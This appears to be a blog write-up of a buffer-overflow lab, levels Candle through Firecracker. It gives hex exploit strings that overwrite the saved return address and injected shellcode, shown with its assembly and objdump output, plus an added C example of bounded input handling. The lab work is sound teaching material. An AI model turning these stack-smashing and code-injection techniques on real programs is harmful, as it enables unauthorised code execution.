  • Buffer Overflows Lab

    The stack layout looks roughly like this (the stack diagram image from the original post is not reproduced here):

    Level 0: Candle

    All that is needed is to overwrite the saved return address on the stack.

    For example:

    c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 
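    To make the mechanism behind "just overwrite the return address" concrete from the defender's side, here is an added example (not the lab's own code, which is not shown in the post). It assumes a hypothetical 32-byte stack buffer (BUF_CAP) filled by an unbounded read; the lab's real buffer size and its Gets/getbuf routines are not stated here. The example computes how far a given input would overshoot such a buffer, and shows a bounded replacement that refuses over-long lines instead of writing past the buffer:

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed example, not the lab's code. BUF_CAP is an assumed buffer
 * size; the lab's actual getbuf buffer size is not given in the post. */
#define BUF_CAP 32

/* Number of bytes an input line of `len` bytes (plus its NUL terminator)
 * would write beyond a `cap`-byte stack buffer if copied without a bound.
 * 0 means the line fits. Any overshoot lands in whatever sits above the
 * buffer: saved registers and, eventually, the saved return address. */
size_t overflow_bytes(size_t cap, size_t len)
{
    size_t needed = len + 1;               /* payload plus NUL */
    return needed > cap ? needed - cap : 0;
}

/* Hardened replacement for an unbounded Gets/strcpy-style fill: copy the
 * line only if it fits, otherwise refuse (return -1) without touching dst.
 * Refusing is preferable to silent truncation, which can hide bad input. */
int copy_line_bounded(char *dst, size_t cap, const char *src)
{
    size_t len = strlen(src);
    if (cap == 0 || len + 1 > cap)
        return -1;
    memcpy(dst, src, len + 1);
    return (int)len;
}

/* Same refusal semantics for a stream: fgets bounds the read itself.
 * Returns the line length, or -1 on EOF or if the line did not fit. */
int read_line_bounded(char *dst, size_t cap, FILE *in)
{
    if (cap < 2 || !fgets(dst, (int)cap, in))
        return -1;
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[--len] = '\0';
        return (int)len;
    }
    if (len < cap - 1)                     /* EOF before newline: fits */
        return (int)len;
    /* No newline and buffer full: the line was too long. Drain the rest
     * of it so the next call starts on a fresh line, then refuse. */
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;
    return -1;
}

int main(void)
{
    char buf[BUF_CAP];
    char payload[65];                      /* 64 filler bytes, like Level 0's input length */
    memset(payload, 'A', 64);
    payload[64] = '\0';
    printf("overflow by %zu bytes\n", overflow_bytes(BUF_CAP, 64));
    printf("bounded copy result: %d\n", copy_line_bounded(buf, BUF_CAP, payload));
    return 0;
}
```

    With the assumed 32-byte buffer, the 64-byte Level 0 input overshoots by 33 bytes (64 payload bytes plus the NUL), which is exactly the room an attacker uses to reach the saved return address; the bounded variants never write those bytes at all.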

    Level 1: Sparkler

    The requirement is to make arg equal to the cookie value.

    c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 70 10 40 00 00 00 00 00 b6 c4 fd 29 b2 96 02 3f b6 c4 fd 29 b2 96 02 3f

    Level 2: Firecracker

    The requirement is to set the global value inside bang to the cookie value.

    The approach: first return to a specific code segment placed on the stack, execute our code that replaces the global value, and then return into the bang function.

    The assembly that replaces the global is:

    mov 0x602320, %rsi 
    mov %rsi, 0x602308
    push $0x00401020
    retq

    Assembling and disassembling it with

    $ gcc -c test.s
    $ objdump -d test.o > test.d

    produces the machine code bytes:

    test.o:     file format elf64-x86-64
    
    
    Disassembly of section .text:
    
    0000000000000000 <.text>:
       0:    48 8b 34 25 20 23 60     mov    0x602320,%rsi
       7:    00 
       8:    48 89 34 25 08 23 60     mov    %rsi,0x602308
       f:    00 
      10:    68 20 10 40 00           pushq  $0x401020
      15:    c3                       retq   

    Then insert this machine code into the appropriate stack segment:

    48 8b 34 25 20 23 60 00 48 89 34 25 08 23 60 00 68 20 10 40 00 c3 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 c0 10 40 00 00 00 00 00 00 b7 ff ff ff 7f 00 00

    That completes the level.

    Extra Credit – Level 3: Dynamite: to be done next time.

    2015-09-28

  • Original post: https://www.cnblogs.com/whuyt/p/4843782.html